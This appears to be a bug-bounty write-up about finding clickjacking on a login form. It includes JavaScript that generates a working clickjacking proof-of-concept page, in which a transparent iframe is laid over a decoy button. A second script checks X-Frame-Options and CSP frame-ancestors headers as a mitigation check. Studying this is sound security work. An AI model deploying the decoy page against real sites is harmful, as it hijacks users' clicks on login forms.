CLICKJACKING TO OBTAIN LOGIN CREDENTIALS
2020-11-15 20:11:57 Source: medium.com Reads: 271

Ehtesham Ul Haq

Hey guys! Hope you are all doing fine. As I was approached by many community members asking me to share some insights regarding my bounties, I thought: what better way to do it than a write-up?

In today’s post, I will be sharing my first ever encounter with clickjacking on a login form. But before that, let’s shed some light on what clickjacking is.


Clickjacking is a portmanteau of “click” and “hijacking”: hijacking someone’s click and using it for malicious purposes.

An attacker loads the vulnerable site in a transparent iframe on the attacker’s own page and uses CSS to stack it over decoy content such as a button. The user sees only the decoy, but the click lands on the invisible framed page, so the user performs unintended actions on the vulnerable site.
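The following is an added example, not code from the original post or its author. It generates the attacker page just described: the target login page in a transparent iframe stacked above a visible decoy button, positioned so that a click on the decoy lands on the framed page’s real control. The target URL (the write-up’s placeholder www.mytarget.com) and every pixel coordinate are assumptions for illustration.

```javascript
// Added example, not from the original post. It generates the attacker page described
// above: the target login page in a transparent iframe, stacked on top of a visible
// decoy button so that a click on the decoy lands on the framed page. The target URL
// and every pixel coordinate below are assumptions for illustration.

// Minimal HTML escaping so the label and URL cannot break out of the markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => (
    { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]
  ));
}

// Where the decoy must be drawn on the attacker page so it lines up with a control
// inside the frame: the frame's own offset plus the control's offset within the
// framed document. Returns page coordinates in CSS pixels.
function alignDecoy(frameBox, targetRect) {
  return {
    top: frameBox.top + targetRect.top,
    left: frameBox.left + targetRect.left,
    width: targetRect.width,
    height: targetRect.height,
  };
}

// Builds the PoC page. `frameBox` is where the iframe is placed on the attacker page,
// `targetRect` is the position of the control to hijack inside the framed document.
function buildClickjackPoc({ targetUrl, frameBox, targetRect, decoyLabel, opacity = 0 }) {
  const d = alignDecoy(frameBox, targetRect);
  const px = (n) => `${n}px`;
  return `<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Claim your prize</title>
<style>
  /* visible decoy underneath (z-index 1) */
  #decoy { position: absolute; top: ${px(d.top)}; left: ${px(d.left)};
           width: ${px(d.width)}; height: ${px(d.height)}; z-index: 1; }
  /* the framed target on top (z-index 2): invisible, but it still receives the click.
     Raise opacity to about 0.3 while aligning, then set it back to 0 for the real PoC. */
  #target { position: absolute; top: ${px(frameBox.top)}; left: ${px(frameBox.left)};
            width: ${px(frameBox.width)}; height: ${px(frameBox.height)};
            opacity: ${opacity}; z-index: 2; border: 0; }
</style>
</head>
<body>
<button id="decoy">${escapeHtml(decoyLabel)}</button>
<iframe id="target" src="${escapeHtml(targetUrl)}"></iframe>
</body>
</html>`;
}

// Constructed sample: assumed target URL and an assumed position of the framed
// form's submit button (in practice measured with the browser's element inspector).
const SAMPLE_POC = {
  targetUrl: 'https://www.mytarget.com/login',                 // assumption
  frameBox: { top: 0, left: 0, width: 1024, height: 768 },     // assumption
  targetRect: { top: 412, left: 380, width: 140, height: 44 }, // assumption
  decoyLabel: 'Claim prize',
};

// Print the page so it can be redirected to a file: node poc.js > poc.html
console.log(buildClickjackPoc(SAMPLE_POC));
```

Open the generated file in a browser while logged out of the target: if the framed login page renders at all, the site is frameable, and the decoy shows how a click can be redirected onto it. If the iframe stays blank, the browser refused to frame the page and the finding does not hold.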


Because the attack works by redressing the page’s user interface, the broader term “UI redressing” is now used for the whole category of such attacks, of which clickjacking is one instance.

Usually it is described as a low-severity finding, but since in my case it existed on a login form and could potentially be exploited to obtain users’ login credentials, it had a much larger impact.

Following my usual routine, I was randomly toying around with www.mytarget.com, a vulnerable site, looking for low-hanging fruit. After performing a check using https://clickjacker.io/ it was confirmed that the site was vulnerable to clickjacking, so I started checking all the endpoints to see if it existed there as well. And BINGO!

Their login form was vulnerable as well.


This information by itself wasn’t enough to back up my finding.

To prove that it had significant impact, I had to provide a PoC showing how it could lead to the user’s credentials being stolen, which was an easy task given the way clickjacking works.


Among many, one of the ways clickjacking can be mitigated is the X-Frame-Options HTTP response header, which indicates whether or not a browser should be allowed to render the page in a <frame>, <iframe>, <embed> or <object>. Its values are DENY and SAMEORIGIN; the older ALLOW-FROM value is obsolete and ignored by current browsers. The modern equivalent is the Content-Security-Policy frame-ancestors directive, which can also name specific origins that may frame the page and takes precedence over X-Frame-Options in browsers that support it.
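The following is an added example, not code from the original post or its author. It applies the mitigation rules described above to a set of response headers and decides whether a given attacker origin could frame the page, covering both X-Frame-Options and the CSP frame-ancestors directive (which supporting browsers honour in preference to X-Frame-Options). The sample responses, the target URL and the attacker origin are all constructed for illustration; the checkUrl helper assumes Node 18+ with a global fetch().

```javascript
// Added example, not from the original post: decides whether a page served with the
// given response headers can be framed by an attacker origin. `headers` maps
// lower-cased header names to arrays of values; every sample response below is constructed.

// Returns the source list of the first frame-ancestors directive found, or null.
function parseFrameAncestors(cspValues) {
  for (const policy of cspValues) {
    for (const directive of policy.split(';')) {
      const tokens = directive.trim().split(/\s+/);
      if (tokens[0].toLowerCase() === 'frame-ancestors') {
        return tokens.slice(1).map((t) => t.toLowerCase());
      }
    }
  }
  return null;
}

// Does one frame-ancestors source expression permit `attacker` (a URL) to frame `page`?
// Handles 'none', 'self', '*', scheme sources ("https:") and host sources with an
// optional scheme, "*." wildcard and port. A scheme-less host source is matched
// against the page's own scheme (a simplification of the CSP matching algorithm).
function sourceAllows(source, attacker, page) {
  if (source === "'none'") return false;
  if (source === '*') return true;
  if (source === "'self'") return attacker.origin === page.origin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(source)) return attacker.protocol === source;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/*]+)(?::(\d+|\*))?$/.exec(source);
  if (!m) return false;
  const [, scheme, wild, host, port] = m;
  if (scheme ? attacker.protocol !== scheme + ':' : attacker.protocol !== page.protocol) return false;
  const h = attacker.hostname;
  if (wild ? !h.endsWith('.' + host) : h !== host) return false;
  if (port && port !== '*' && attacker.port !== port) return false;
  return true;
}

function frameProtection(headers, pageUrl, attackerUrl) {
  const page = new URL(pageUrl);
  const attacker = new URL(attackerUrl);
  // A frame-ancestors directive makes supporting browsers ignore X-Frame-Options entirely.
  const ancestors = parseFrameAncestors(headers['content-security-policy'] || []);
  if (ancestors) {
    const allowed = ancestors.some((s) => sourceAllows(s, attacker, page));
    return { frameable: allowed, via: 'csp', detail: `frame-ancestors ${ancestors.join(' ')}` };
  }
  const xfo = (headers['x-frame-options'] || []).map((v) => v.trim().toUpperCase());
  if (xfo.length === 0) {
    return { frameable: true, via: 'none', detail: 'neither X-Frame-Options nor frame-ancestors is set' };
  }
  if (new Set(xfo).size > 1) {
    // Chromium and Firefox refuse to render the frame when the values conflict.
    return { frameable: false, via: 'xfo', detail: `conflicting values ${xfo.join(', ')}` };
  }
  if (xfo[0] === 'DENY') return { frameable: false, via: 'xfo', detail: 'DENY' };
  if (xfo[0] === 'SAMEORIGIN') {
    return { frameable: attacker.origin === page.origin, via: 'xfo', detail: 'SAMEORIGIN' };
  }
  // ALLOW-FROM is obsolete and any unrecognised value is ignored, leaving the page frameable.
  return { frameable: true, via: 'xfo', detail: `unrecognised value "${xfo[0]}" is ignored` };
}

// Live check (not exercised offline): Node 18+ fetch(). Headers joins repeated
// X-Frame-Options values with commas, so split them back out before classifying.
async function checkUrl(pageUrl, attackerUrl) {
  const res = await fetch(pageUrl, { redirect: 'follow' });
  const headers = {};
  for (const [name, value] of res.headers) {
    headers[name] = name === 'x-frame-options' ? value.split(',') : [value];
  }
  return frameProtection(headers, res.url || pageUrl, attackerUrl);
}

// Constructed sample responses (not captured from any real site).
const SAMPLES = {
  unprotected: { 'content-type': ['text/html'] },
  xfoDeny: { 'x-frame-options': ['DENY'] },
  xfoAllowFrom: { 'x-frame-options': ['ALLOW-FROM https://partner.example'] },
  cspSelf: { 'content-security-policy': ["default-src 'self'; frame-ancestors 'self'"] },
  cspPartner: { 'content-security-policy': ["frame-ancestors 'self' https://*.partner.example"] },
  bothHeaders: { 'x-frame-options': ['DENY'], 'content-security-policy': ['frame-ancestors *'] },
};

const PAGE = 'https://www.mytarget.com/login'; // assumed target, as in the write-up
const ATTACKER = 'https://attacker.example';   // assumed attacker origin
for (const [name, headers] of Object.entries(SAMPLES)) {
  const r = frameProtection(headers, PAGE, ATTACKER);
  console.log(`${name.padEnd(12)} frameable=${r.frameable} (${r.via}: ${r.detail})`);
}
```

Two of the constructed cases are the ones that trip people up: `bothHeaders` is frameable despite `X-Frame-Options: DENY`, because a present frame-ancestors directive wins, and `xfoAllowFrom` is frameable because ALLOW-FROM is no longer honoured. Run the check against the final URL after redirects, since a login page is often reached through one.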

For this particular finding, I was awarded a pretty good bounty, which I wasn’t even expecting.


So as you can see, even these low-hanging bugs can pay a hefty amount. All that matters is which endpoint the bug exists on and what sort of impact it can have. Hope this will be of some help to you guys; see you next time, and till then stay positive and keep testing negative. Happy hunting!


Source: https://medium.com/bugbountywriteup/clickjacking-to-obtain-login-credentials-abee3ae9825e?source=rss----7b722bfd1b8d--bug_bounty